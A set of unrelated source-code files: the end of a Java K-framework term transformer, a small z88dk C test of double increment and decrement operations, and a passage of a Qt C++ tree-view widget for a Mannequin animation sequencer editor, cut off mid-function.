module.attributesFor().get(k.klabel()).getOrElse(() -> Att.empty()).getOptional("hook").orElse(""); if (hook.equals("SET.element") || hook.equals("LIST.element") || hook.equals("LIST.concat") || hook.equals("MAP.concat") || hook.equals("SET.concat")) { return; } if (hook.equals("MAP.element")) { apply(k.items().get(1)); return; } super.apply(k); } }.apply(term); } void filterTerms(K term, boolean body) { new RewriteAwareVisitor(body, new HashSet<>()) { @Override public void apply(K k) { if (isRHS() && !isLHS() && cache.containsKey(k)) { usedOnRhs.add(k); return; } super.apply(k); } }.apply(term); } K transform(K term, boolean body) { AddSortInjections sorts = new AddSortInjections(module); return new RewriteAwareTransformer(body) { @Override public K apply(K k) { if (isRHS() && !isLHS()) { if (cache.containsKey(k)) { return cache.get(k); } } if (isLHS() && !isRHS() && !inBad) { if (usedOnRhs.contains(k)) { return KAs(super.apply(k), cache.get(k), Att.empty().add(Sort.class, cache.get(k).att().get(Sort.class))); } } return super.apply(k); } boolean inBad = false; @Override public K apply(KApply k) { boolean stack = inBad; if (k.klabel().head().equals(KLabels.ML_OR)) { inBad = true; } String hook = module.attributesFor().get(k.klabel()).getOrElse(() -> Att.empty()).getOptional("hook").orElse(""); if (hook.equals("SET.element") || hook.equals("LIST.element") || hook.equals("LIST.concat") || hook.equals("MAP.concat") || hook.equals("SET.concat")) { inBad = true; } if (hook.equals("MAP.element")) { inBad = true; K key = apply(k.items().get(0)); inBad = stack; K val = apply(k.items().get(1)); return KApply(k.klabel(), KList(key, val), k.att()); } K result = super.apply(k); inBad = stack; return result; } }.apply(term); } private int counter = 0; KVariable newDotVariable(Sort sort) { KVariable newLabel; do { newLabel = KVariable("_" + (counter++), Att().add(Sort.class, sort)); } while (vars.contains(newLabel)); vars.add(newLabel); return newLabel; } }
3,651
640
<reponame>jpoikela/z88dk double double_post_increment() { double x = 3.0; x++; return x; } double double_post_increment_assign() { double x = 3.0; double y; y = x++; return x; } double double_pre_increment() { double x = 3.0; ++x; return x; } double double_pre_increment_assign() { double x = 3.0; double y; y = ++x; return x; } double double_post_decrement() { double x = 3.0; x--; return x; } double double_post_decrement_assign() { double x = 3.0; double y; y = x--; return x; } double double_pre_decrement() { double x = 3.0; --x; return x; } double double_pre_decrement_assign() { double x = 3.0; double y; y = --x; return x; }
485
1,738
/* * All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or * its licensors. * * For complete copyright and license terms please see the LICENSE at the root of this * distribution (the "License"). All use of this software is governed by the License, * or, if provided, by the license below or the license accompanying this file. Do not * remove or modify any license notices. This file is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * */ // Original file Copyright Crytek GMBH or its affiliates, used under license. #include "StdAfx.h" #include "SequencerNode.h" #include "SequencerTrack.h" #include "MannequinNodes.h" #include "MannequinDialog.h" #include "SequencerSequence.h" #include "SequencerDopeSheet.h" #include "SequencerUndo.h" #include "StringDlg.h" #include "Clipboard.h" #include "ISequencerSystem.h" #include "Objects/EntityObject.h" #include "ViewManager.h" #include "RenderViewport.h" #include "SequencerTrack.h" #include "SequencerNode.h" #include "MannequinDialog.h" #include "FragmentTrack.h" #include <QHeaderView> #include <QMenu> #include <QMessageBox> #include <QMimeData> #include <QScrollBar> #define EDIT_DISABLE_GRAY_COLOR QColor(180, 180, 180) namespace { static const int MUTE_TRACK_ICON_UNMUTED = 18; static const int MUTE_TRACK_ICON_MUTED = 19; static const int MUTE_TRACK_ICON_SOLO = 20; static const int MUTE_NODE_ICON_UNMUTED = 21; static const int MUTE_NODE_ICON_MUTED = 22; static const int MUTE_NODE_ICON_SOLO = 23; } const int kIconFromParamID[SEQUENCER_PARAM_TOTAL] = {0, 0, 14, 3, 10, 13}; const int kIconFromNodeType[SEQUENCER_NODE_TOTAL] = {1, 1, 1, 1, 1, 2}; class MannNodesTreeModel : public QAbstractItemModel { public: MannNodesTreeModel(CMannNodesWidget* parent) : QAbstractItemModel(parent) , m_sequence(nullptr) , m_widget(parent) { } enum Role { NodeRole = Qt::UserRole, TrackRole }; QStringList mimeTypes() const override { return{ EditorDragDropHelpers::GetAnimationNameClipboardFormat(), QStringLiteral("application/x-mannequin-track-index")}; } QMimeData* mimeData(const QModelIndexList& indexes) const override { QMimeData* data = new QMimeData; QByteArray d; QDataStream stream(&d, QIODevice::WriteOnly); for (auto i : indexes) { if (i.column() == 0) { stream << i.row() << i.internalId(); } } data->setData(QStringLiteral("application/x-mannequin-track-index"), d); return data; } Qt::DropActions supportedDropActions() const override { return Qt::MoveAction; } bool canDropMimeData(const QMimeData* data, Qt::DropAction action, int row, int column, const QModelIndex& parent) const override { if (!QAbstractItemModel::canDropMimeData(data, action, row, column, parent)) { return false; } if (data->hasFormat(EditorDragDropHelpers::GetAnimationNameClipboardFormat())) { QModelIndex i = index(row, column, parent); return m_widget->IsPointValidForAnimationInContextDrop(i, data); } else if (data->hasFormat(QStringLiteral("application/x-mannequin-track-index"))) { if (!parent.parent().isValid()) { return row != -1; } return false; } return false; } bool dropMimeData(const QMimeData* data, Qt::DropAction action, int row, int column, const QModelIndex& parent) override { if (!canDropMimeData(data, action, row, column, parent)) { return false; } if (data->hasFormat(EditorDragDropHelpers::GetAnimationNameClipboardFormat())) { return m_widget->CreatePointForAnimationInContextDrop( m_widget->IsPointValidForAnimationInContextDrop( index(row, column, parent), data ), QPoint(), data ); } else if (data->hasFormat(QStringLiteral("application/x-mannequin-track-index"))) { QByteArray d = data->data(QStringLiteral("application/x-mannequin-track-index")); QDataStream stream(&d, QIODevice::ReadOnly); QModelIndexList indexes; while (!stream.atEnd()) { int r; quintptr id; stream >> r >> id; indexes.push_back(createIndex(r, 0, id)); } if (indexes.isEmpty()) { return false; } QModelIndex target = parent; if (row >= 0 && row < rowCount(parent)) { target = index(row, 0, parent); } m_widget->OnDragAndDrop(indexes, target); return true; } return false; } void setSequence(CSequencerSequence* seq) { beginResetModel(); m_sequence = seq; endResetModel(); } CSequencerSequence* sequence() { return m_sequence; } QModelIndex findNode(CSequencerNode* node) const { if (!m_sequence) { return QModelIndex(); } for (int row = 0; row < m_sequence->GetNodeCount(); ++row) { if (node == m_sequence->GetNode(row)) { return createIndex(row, 0, -1); } } return QModelIndex(); } QModelIndex createTrack(CSequencerNode* node, ESequencerParamType nParamId) { const QModelIndex nodeIndex = findNode(node); const int count = rowCount(nodeIndex); beginInsertRows(nodeIndex, count, count); CSequencerTrack* sequenceTrack = node->CreateTrack(nParamId); if (sequenceTrack) { sequenceTrack->OnChange(); } endInsertRows(); return index(count, 0, nodeIndex); } void setTrackVisible(CSequencerNode* node, CSequencerTrack* track, bool visible) { // nothing do do? if (visible && (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN) == 0) { return; } else if (!visible && (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN)) { return; } const QModelIndex nodeIndex = findNode(node); int row = 0; CSequencerNode::SParamInfo paramInfo; for (int i = 0; i < node->GetTrackCount(); ++i) { CSequencerTrack* t = node->GetTrackByIndex(i); const ESequencerParamType type = t->GetParameterType(); if (!node->GetParamInfoFromId(type, paramInfo)) { continue; } if (t == track) { break; } if (t->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN) { continue; } ++row; } // change hidden flag for this track. if (visible) { beginInsertRows(nodeIndex, row, row); track->SetFlags(track->GetFlags() & ~CSequencerTrack::SEQUENCER_TRACK_HIDDEN); endInsertRows(); } else { beginRemoveRows(nodeIndex, row, row); track->SetFlags(track->GetFlags() | CSequencerTrack::SEQUENCER_TRACK_HIDDEN); endRemoveRows(); } } bool removeRows(int row, int count, const QModelIndex& parent = QModelIndex()) override { CSequencerNode* node = parent.data(NodeRole).value<CSequencerNode*>(); CSequencerTrack* track = index(row, 0, parent).data(TrackRole).value<CSequencerTrack*>(); if (!node || !track) { return false; } for (int r = row + count - 1; r >= row; --r) { const QModelIndex i = index(r, 0, parent); CSequencerTrack* track = i.data(TrackRole).value<CSequencerTrack*>(); if (!track) { continue; } beginRemoveRows(parent, r, r); node->RemoveTrack(track); endRemoveRows(); } return true; } int rowCount(const QModelIndex& parent) const override { if (!m_sequence) { return 0; } if (parent.isValid()) { if (parent.internalId() == -3) // extra row { return 0; } else if (parent.internalId() == -2) // root index, get number of nodes { return m_sequence->GetNodeCount(); } else if (parent.internalId() == -1) // node index, get number of tracks { int count = 0; CSequencerNode* node = m_sequence->GetNode(parent.row()); CSequencerNode::SParamInfo paramInfo; for (int i = 0; i < node->GetTrackCount(); ++i) { CSequencerTrack* track = node->GetTrackByIndex(i); if (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN) { continue; } const ESequencerParamType type = track->GetParameterType(); if (!node->GetParamInfoFromId(type, paramInfo)) { continue; } ++count; } return count; } else { return 0; } } return 1; } int columnCount(const QModelIndex& parent) const override { Q_UNUSED(parent); return 2; } QModelIndex index(int row, int column, const QModelIndex& parent = QModelIndex()) const override { if (row < 0 || row >= rowCount(parent) || column < 0 || column >= columnCount(parent)) { return QModelIndex(); } if (!parent.isValid()) { return createIndex(row, column, row == 0 ? -2 : -3); // root index wanted } if (parent.internalId() == -1) // parent is a node index, create a track index { return createIndex(row, column, parent.row()); } else // create a node index { return createIndex(row, column, -1); } } QModelIndex parent(const QModelIndex& index) const override { if (!index.isValid()) { return QModelIndex(); } if (index.internalId() == -2 || index.internalId() == -3) // root index { return QModelIndex(); } if (index.internalId() == -1) // node index -> gets root index as parent { return createIndex(0, 0, -2); } else // track index -> gets node index as parent { return createIndex(index.internalId(), 0, -1); } } QVariant data(const QModelIndex& index, int role = Qt::DisplayRole) const override { if (!index.isValid()) { return QVariant(); } QFont font; font.setBold(true); if (!index.parent().isValid()) { if (index.row() == 0) { assert(m_sequence); switch (role) { case Qt::DisplayRole: return index.column() == 0 ? m_sequence->GetName() : QString(); case Qt::SizeHintRole: return QSize(index.column() == 0 ? 150 : 20, 24); case Qt::FontRole: return font; case Qt::TextAlignmentRole: return QVariant::fromValue<int>(Qt::AlignTop | Qt::AlignLeft); default: return QVariant(); } } else if (index.row() == 1) { // Additional empty record like space for scrollbar in key control if (role == Qt::SizeHintRole) { return QSize(index.column() == 0 ? 150 : 20, 18); } return QVariant(); } } else if (index.internalId() == -1) // node index { CSequencerNode* node = m_sequence->GetNode(index.row()); if (index.column() == 1) { if (role == Qt::DecorationRole) { return GetIconIndexForMute(index); } } switch (role) { case Qt::DisplayRole: return index.column() == 0 ? QString::fromLatin1(node->GetName()) : QString(); case Qt::SizeHintRole: return QSize(index.column() == 0 ? 150 : 20, 16 + 2); case Qt::FontRole: return font; case Qt::TextAlignmentRole: return QVariant::fromValue<int>(Qt::AlignTop | Qt::AlignLeft); case Qt::DecorationRole: return GetIconIndexForNode(node->GetType()); case NodeRole: return QVariant::fromValue(node); default: return QVariant(); } } else // track index { CSequencerNode* node = m_sequence->GetNode(index.internalId()); CSequencerNode::SParamInfo paramInfo; int row = index.row(); for (int i = 0; i < node->GetTrackCount(); ++i) { CSequencerTrack* track = node->GetTrackByIndex(i); if (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN) { continue; } const ESequencerParamType type = track->GetParameterType(); if (!node->GetParamInfoFromId(type, paramInfo)) { continue; } if (row-- > 0) { continue; } if (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_READONLY) { node->SetReadOnly(true); } if (index.column() == 1) { if (role == Qt::DecorationRole) { if ((type == SEQUENCER_PARAM_ANIMLAYER) || (type == SEQUENCER_PARAM_PROCLAYER)) { return GetIconIndexForMute(index); } return QVariant(); } } switch (role) { case Qt::DisplayRole: return index.column() == 0 ? QString::fromLatin1(paramInfo.name) : QString(); case Qt::SizeHintRole: return QSize(index.column() == 0 ? 150 : 20, gSettings.mannequinSettings.trackSize + 2); case Qt::ForegroundRole: return QPalette().color(QPalette::Highlight); case Qt::TextAlignmentRole: return QVariant::fromValue<int>(Qt::AlignTop | Qt::AlignLeft); case Qt::DecorationRole: return GetIconIndexForParam(type); case NodeRole: return QVariant::fromValue(node); case TrackRole: return QVariant::fromValue(track); default: return QVariant(); } } } return QVariant(); } Qt::ItemFlags flags(const QModelIndex& index) const override { Qt::ItemFlags f = QAbstractItemModel::flags(index); if (!index.parent().isValid() && index.row() == 1) { f &= ~Qt::ItemIsSelectable; } CSequencerNode* node = nullptr; if (index.internalId() == -1 && (node = m_sequence->GetNode(index.row()))) { if (node->CanAddTrackForParameter(SEQUENCER_PARAM_ANIMLAYER)) { f |= Qt::ItemIsDropEnabled; } } if (index.isValid() && index.internalId() == -1) // only nodes can be moved { f |= Qt::ItemIsDragEnabled; } if (!index.parent().isValid()) { f |= Qt::ItemIsDropEnabled; } return f; } void toggleMute(const QModelIndex& index) { if (CSequencerTrack* track = index.data(TrackRole).value<CSequencerTrack*>()) { muteNodesRecursive(index, !track->IsMuted()); } else if (CSequencerNode* node = index.data(NodeRole).value<CSequencerNode*>()) { muteNodesRecursive(index, !node->IsMuted()); } } void muteAllBut(const QModelIndex& index) { muteAllNodes(); muteNodesRecursive(index, false); } void muteAllNodes() { muteNodesRecursive(index(0, 0), true); } void unmuteAllNodes() { muteNodesRecursive(index(0, 0), false); } protected: void muteNodesRecursive(const QModelIndex& index, bool bMute) { if (CSequencerTrack* track = index.data(TrackRole).value<CSequencerTrack*>()) { track->Mute(bMute); emit dataChanged(index.sibling(index.row(), 0), index.sibling(index.row(), 1)); CSequencerNode* node = index.data(NodeRole).value<CSequencerNode*>(); const QModelIndex parent = index.parent(); CSequencerNode* parentNode = parent.data(NodeRole).value<CSequencerNode*>(); CSequencerTrack* parentTrack = parent.data(TrackRole).value<CSequencerTrack*>(); if (parentNode && !parentTrack && (parentNode == node)) { uint32 mutedAnimLayerMask; uint32 mutedProcLayerMask; generateMuteMasks(parent, mutedAnimLayerMask, mutedProcLayerMask); parentNode->UpdateMutedLayerMasks(mutedAnimLayerMask, mutedProcLayerMask); emit dataChanged(parent.sibling(parent.row(), 0), parent.sibling(parent.row(), 1)); } } else if (CSequencerNode* node = index.data(NodeRole).value<CSequencerNode*>()) { node->Mute(bMute); emit dataChanged(index.sibling(index.row(), 0), index.sibling(index.row(), 1)); } int numRecords = rowCount(index); for (int i = 0; i < numRecords; ++i) { const QModelIndex& child = index.model()->index(1, 0, index); muteNodesRecursive(child, bMute); } } void generateMuteMasks(const QModelIndex& index, uint32& mutedAnimLayerMask, uint32& mutedProcLayerMask) { mutedAnimLayerMask = 0; mutedProcLayerMask = 0; uint32 animCount = 0; uint32 procCount = 0; bool bHasFragmentId = false; int numRecords = rowCount(index); for (uint32 i = 0; i < numRecords; ++i) { const QModelIndex child = index.model()->index(i, 0, index); if (CSequencerTrack* track = child.data(TrackRole).value<CSequencerTrack*>()) { switch (track->GetParameterType()) { case SEQUENCER_PARAM_FRAGMENTID: { bHasFragmentId = true; } break; case SEQUENCER_PARAM_ANIMLAYER: { if (track->IsMuted()) { mutedAnimLayerMask |= BIT(animCount); } ++animCount; } break; case SEQUENCER_PARAM_PROCLAYER: { if (track->IsMuted()) { mutedProcLayerMask |= BIT(procCount); } ++procCount; } break; default: break; } } } if (bHasFragmentId && !animCount && !procCount) { // special case: if there is a fragmentId, but no anim or proc layers // assume everything is controlled by parent state. if (CSequencerNode* node = index.data(NodeRole).value<CSequencerNode*>()) { if (node->IsMuted()) { mutedAnimLayerMask = 0xFFFFFFFF; mutedProcLayerMask = 0xFFFFFFFF; } } } } QPixmap GetIconIndexForParam(ESequencerParamType type) const { return QPixmap(QStringLiteral(":/FragmentBrowser/Controls/sequencer_nodes_%1.png").arg(kIconFromParamID[type], 2, 10, QLatin1Char('0'))); } QPixmap GetIconIndexForNode(ESequencerNodeType type) const { return QPixmap(QStringLiteral(":/FragmentBrowser/Controls/sequencer_nodes_%1.png").arg(kIconFromNodeType[type], 2, 10, QLatin1Char('0'))); } QPixmap GetIconIndexForMute(const QModelIndex& index) const { int icon = MUTE_TRACK_ICON_UNMUTED; if (CSequencerTrack* track = index.data(TrackRole).value<CSequencerTrack*>()) { icon = track->IsMuted() ? MUTE_TRACK_ICON_MUTED : MUTE_TRACK_ICON_UNMUTED; } else if (CSequencerNode* node = index.data(NodeRole).value<CSequencerNode*>()) { icon = node->IsMuted() ? MUTE_NODE_ICON_MUTED : MUTE_NODE_ICON_UNMUTED; } return QPixmap(QStringLiteral(":/FragmentBrowser/Controls/sequencer_nodes_%1.png").arg(icon, 2, 10, QLatin1Char('0'))); } private: CSequencerSequence* m_sequence; CMannNodesWidget* m_widget; }; ////////////////////////////////////////////////////////////////////////// CMannNodesWidget::CMannNodesWidget(QWidget* parent) : QTreeView(parent) , m_model(new MannNodesTreeModel(this)) { m_keysCtrl = 0; setAcceptDrops(true); setDragEnabled(true); setModel(m_model); connect(this, &QTreeView::clicked, this, &CMannNodesWidget::OnNMLclick); connect(this, &QWidget::customContextMenuRequested, this, &CMannNodesWidget::OnNMRclick); connect(this, &QTreeView::collapsed, this, &CMannNodesWidget::OnItemExpanded); connect(this, &QTreeView::expanded, this, &CMannNodesWidget::OnItemExpanded); connect(selectionModel(), &QItemSelectionModel::selectionChanged, this, &CMannNodesWidget::OnSelectionChanged); setHeaderHidden(true); header()->setSectionResizeMode(QHeaderView::Fixed); header()->resizeSection(0, 150); header()->resizeSection(1, 20); setSelectionMode(QAbstractItemView::ExtendedSelection); setContextMenuPolicy(Qt::CustomContextMenu); if (verticalScrollBar()) { connect(verticalScrollBar(), &QScrollBar::valueChanged, this, &CMannNodesWidget::OnVerticalScroll); } m_bEditLock = false; }; ////////////////////////////////////////////////////////////////////////// CMannNodesWidget::~CMannNodesWidget() { }; QModelIndexList allIndexes(const QAbstractItemModel* model, const QModelIndex& parent = QModelIndex()) { QModelIndexList result; for (int i = 0; i < model->rowCount(parent); ++i) { const QModelIndex index = model->index(i, 0, parent); result.push_back(index); result += allIndexes(model, index); } return result; }; ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::SetSequence(CSequencerSequence* seq) { m_model->setSequence(seq); foreach (const QModelIndex &index, allIndexes(m_model)) { CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); if (node == nullptr || node->GetStartExpanded()) { expand(index); } } SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::SetKeyListCtrl(CSequencerDopeSheetBase* keysCtrl) { m_keysCtrl = keysCtrl; //SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnItemExpanded() { SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnSelectionChanged() { m_keysCtrl->ClearSelection(); if (!m_model->sequence()) { return; } // Clear track selections. for (int i = 0; i < m_model->sequence()->GetNodeCount(); i++) { CSequencerNode* node = m_model->sequence()->GetNode(i); for (int t = 0; t < node->GetTrackCount(); t++) { node->GetTrackByIndex(t)->SetSelected(false); } } const QModelIndexList selection = selectionModel()->selectedRows(); for (const QModelIndex& index : selection) { CSequencerTrack* track = index.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); if (!track) { continue; } for (int i = 0; i < m_keysCtrl->GetCount(); i++) { if (track) { track->SetSelected(true); } if (m_keysCtrl->GetTrack(i) == track) { m_keysCtrl->SelectItem(i); break; } } } GetIEditor()->Notify(eNotify_OnUpdateSequencerKeySelection); } QModelIndexList CMannNodesWidget::expandedIndexes(const QModelIndex& parent) { QModelIndexList result; QModelIndex curIndex = parent; do { result.push_back(curIndex); curIndex = indexBelow(curIndex); } while (curIndex.isValid() && visualRect(curIndex).isValid()); return result; }; ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::SyncKeyCtrl() { if (!m_keysCtrl) { return; } m_keysCtrl->ResetContent(); if (!m_model->sequence()) { return; } int nStartRow = 0; QModelIndex topRow = indexAt(rect().topLeft()); foreach (const QModelIndex&index, expandedIndexes(topRow)) { const int nItemHeight = index.data(Qt::SizeHintRole).toSize().height(); CSequencerDopeSheet::Item item; CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); CSequencerTrack* track = index.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); if (track != nullptr && node != nullptr) { item = CSequencerDopeSheet::Item(nItemHeight, node, track->GetParameterType(), track); } else { item = CSequencerDopeSheet::Item(nItemHeight, node); } item.nHeight = nItemHeight; item.bSelected = false; if (track) { item.bSelected = (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_SELECTED) != 0; } m_keysCtrl->AddItem(item); } } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::ExpandNode(CSequencerNode* node) { expand(m_model->findNode(node)); SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// bool CMannNodesWidget::IsNodeExpanded(CSequencerNode* node) { return isExpanded(m_model->findNode(node)); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::SelectNode(const char* sName) { selectionModel()->clear(); const QModelIndex root = m_model->index(0, 0); const int count = m_model->rowCount(root); for (int i = 0; i < count; ++i) { const QModelIndex index = root.model()->index(i, 0, root); CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); if (node != nullptr && _stricmp(node->GetName(), sName) == 0) { setCurrentIndex(index); break; } } SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnVerticalScroll() { SyncKeyCtrl(); } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnNMLclick(const QModelIndex& index) { if (index.column() == eCOLUMN_MUTE) { m_model->toggleMute(index); RefreshTracks(); } } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnNMRclick(const QPoint& point) { if (!m_model->sequence()) { return; } // Select the item that is at the point myPoint. const QModelIndex index = indexAt(point); CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); if (!node) { return; } int cmd = ShowPopupMenu(point, index); QModelIndex scrollPos = SaveVerticalScrollPos(); if (cmd >= eMenuItem_AddLayer_First && cmd < eMenuItem_AddLayer_Last) { if (node) { int paramIndex = cmd - eMenuItem_AddLayer_First; AddTrack(paramIndex, node); } } else if (cmd == eMenuItem_CreateForCurrentTags) { node->OnMenuOption(eMenuItem_CreateForCurrentTags); RefreshTracks(); } else if (cmd == eMenuItem_CopyLayer) { m_keysCtrl->CopyTrack(); } else if (cmd == eMenuItem_PasteLayer) { if (node) { PasteTrack(node); } } else if (cmd == eMenuItem_RemoveLayer) { if (node) { RemoveTrack(index); } } else if (cmd >= eMenuItem_ShowHide_First && cmd < eMenuItem_ShowHide_Last) { if (node) { ShowHideTrack(node, cmd - eMenuItem_ShowHide_First); } } else if (cmd == eMenuItem_CopySelectedKeys) { m_keysCtrl->CopyKeys(); } else if (cmd == eMenuItem_CopyKeys) { m_keysCtrl->CopyKeys(true, true, true); } else if (cmd == eMenuItem_PasteKeys) { CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); CSequencerTrack* track = index.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); m_keysCtrl->PasteKeys(node, track, 0); } else if (cmd == eMenuItem_MuteNode) { m_model->toggleMute(index); RefreshTracks(); } else if (cmd == eMenuItem_SoloNode) { m_model->muteAllBut(index); RefreshTracks(); } else if (cmd == eMenuItem_MuteAll) { m_model->muteAllNodes(); RefreshTracks(); } else if (cmd == eMenuItem_UnmuteAll) { m_model->unmuteAllNodes(); RefreshTracks(); } else { if (node) { node->OnMenuOption(cmd); } } if (cmd) { RestoreVerticalScrollPos(scrollPos); SyncKeyCtrl(); } } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::OnDragAndDrop(const QModelIndexList& pRows, const QModelIndex& target) { if (pRows.isEmpty()) { return; } bool bContainTarget = pRows.contains(target); if (target.isValid()) { QModelIndex pFirstRecordSrc = pRows.first(); QModelIndex pRecordTrg = target; if (pFirstRecordSrc.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>() && pRecordTrg.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>() && !bContainTarget) { const char* srcFirstNodeName = pFirstRecordSrc.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>()->GetName(); CAnimSequenceUndo undo(m_model->sequence(), "Reorder Node"); CSequencerNode* pTargetNode = pRecordTrg.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); for (size_t i = 0; i < pRows.count(); ++i) { QModelIndex pRecord = pRows.at(pRows.count() - i - 1); bool next = false; m_model->sequence()->ReorderNode(pRecord.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(), pTargetNode, next); } InvalidateNodes(); SelectNode(srcFirstNodeName); } else { if (pRecordTrg == m_model->index(0, 0)) { CAnimSequenceUndo undo(m_model->sequence(), "Detach Anim Node from Group"); for (size_t i = 0; i < pRows.count(); ++i) { QModelIndex pRecord = pRows.at(pRows.count() - i - 1); m_model->sequence()->ReorderNode(pRecord.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(), NULL, false); } InvalidateNodes(); } } } } ////////////////////////////////////////////////////////////////////////// void CMannNodesWidget::InvalidateNodes() { const QSignalBlocker sb(m_model); // do _not_ reload the model, ignore it being reset /* Notify belows informs other listeners about changes in the sequence. We already know about these changes. The reset is a noop in that case and will only make trouble with selection state and such. */ GetIEditor()->Notify(eNotify_OnUpdateSequencer); } ////////////////////////////////////////////////////////////////////////// bool CMannNodesWidget::GetSelectedNodes(AnimNodes& nodes) { const QModelIndexList selection = selectionModel()->selectedRows(); for (const QModelIndex& index : selection) { CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); if (node) { stl::push_back_unique(nodes, node); } } return !nodes.empty(); } ////////////////////////////////////////////////////////////////////////// bool CMannNodesWidget::HasNode(const char* name) const { if (name == NULL) { return false; } CSequencerNode* pNode = m_model->sequence()->FindNodeByName(name); if (pNode) { return true; } else { return false; } } void CMannNodesWidget::AddTrack(int paramIndex, CSequencerNode* node) { CSequencerNode::SParamInfo paramInfo; if (!node->GetParamInfo(paramIndex, paramInfo)) { return; } CAnimSequenceUndo undo(m_model->sequence(), "Add Layer"); m_model->createTrack(node, paramInfo.paramId); InvalidateNodes(); ExpandNode(node); } bool CMannNodesWidget::CanPasteTrack(CSequencerNode* node) { CClipboard clip(this); if (clip.IsEmpty()) { return false; } XmlNodeRef copyNode = clip.Get(); if (copyNode == NULL || strcmp(copyNode->getTag(), "TrackCopy")) { return false; } if (copyNode->getChildCount() < 1) { return false; } XmlNodeRef trackNode = copyNode->getChild(0); int intParamId = 0; trackNode->getAttr("paramId", intParamId); if (!intParamId) { return false; } if (!node->CanAddTrackForParameter(static_cast<ESequencerParamType>(intParamId))) { return false; } return true; } void CMannNodesWidget::PasteTrack(CSequencerNode* node) { if (!CanPasteTrack(node)) { return; } CClipboard clip(this); XmlNodeRef copyNode = clip.Get(); XmlNodeRef trackNode = copyNode->getChild(0); int intParamId = 0; trackNode->getAttr("paramId", intParamId); CAnimSequenceUndo undo(m_model->sequence(), "Paste Layer"); const QModelIndex trackIndex = m_model->createTrack(node, static_cast<ESequencerParamType>(intParamId)); CSequencerTrack* sequenceTrack = trackIndex.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); if (sequenceTrack) { sequenceTrack->SerializeSelection(trackNode, true, false, 0.0f); sequenceTrack->OnChange(); } InvalidateNodes(); ExpandNode(node); } void CMannNodesWidget::RemoveTrack(const QModelIndex& index) { if (QMessageBox::question(this, QString(), tr("Are you sure you want to delete this track ? Undo will not be available !")) == QMessageBox::Yes) { CAnimSequenceUndo undo(m_model->sequence(), "Remove Track"); m_model->removeRow(index.row(), index.parent()); InvalidateNodes(); } } void CMannNodesWidget::ShowHideTrack(CSequencerNode* node, int trackIndex) { CAnimSequenceUndo undo(m_model->sequence(), "Modify Track"); CSequencerTrack* track = node->GetTrackByIndex(trackIndex); m_model->setTrackVisible(node, track, track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN); InvalidateNodes(); } void CMannNodesWidget::RefreshTracks() { if (m_keysCtrl) { float fTime = m_keysCtrl->GetCurrTime(); if (CMannequinDialog::GetCurrentInstance()->IsPaneSelected<CFragmentEditorPage*>()) { CMannequinDialog::GetCurrentInstance()->FragmentEditor()->SetTime(fTime); } else if (CMannequinDialog::GetCurrentInstance()->IsPaneSelected<CPreviewerPage*>()) { CMannequinDialog::GetCurrentInstance()->Previewer()->SetTime(fTime); } else if (CMannequinDialog::GetCurrentInstance()->IsPaneSelected<CTransitionEditorPage*>()) { CMannequinDialog::GetCurrentInstance()->TransitionEditor()->SetTime(fTime); } } InvalidateNodes(); } int CMannNodesWidget::ShowPopupMenu(const QPoint& point, const QModelIndex& index) { // Create pop up menu. switch (index.column()) { default: case eCOLUMN_NODE: { return ShowPopupMenuNode(point, index); } break; case eCOLUMN_MUTE: { return ShowPopupMenuMute(point, index); } break; } return 0; } int CMannNodesWidget::ShowPopupMenuNode(const QPoint& point, const QModelIndex& index) { QMenu menu; QMenu menuAddTrack; bool onNode = false; CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); CSequencerTrack* track = index.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); if (selectionModel()->selectedRows().count() == 1) { bool notOnValidItem = !node; bool onValidItem = !notOnValidItem; onNode = onValidItem && track == NULL; bool onTrack = onValidItem && track != NULL; bool bReadOnly = false; if ((onValidItem && node->IsReadOnly()) || (onTrack && (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_READONLY) != 0)) { bReadOnly = true; } if (onValidItem) { if (onNode) { menu.addSeparator(); menu.addAction(tr("Copy Selected 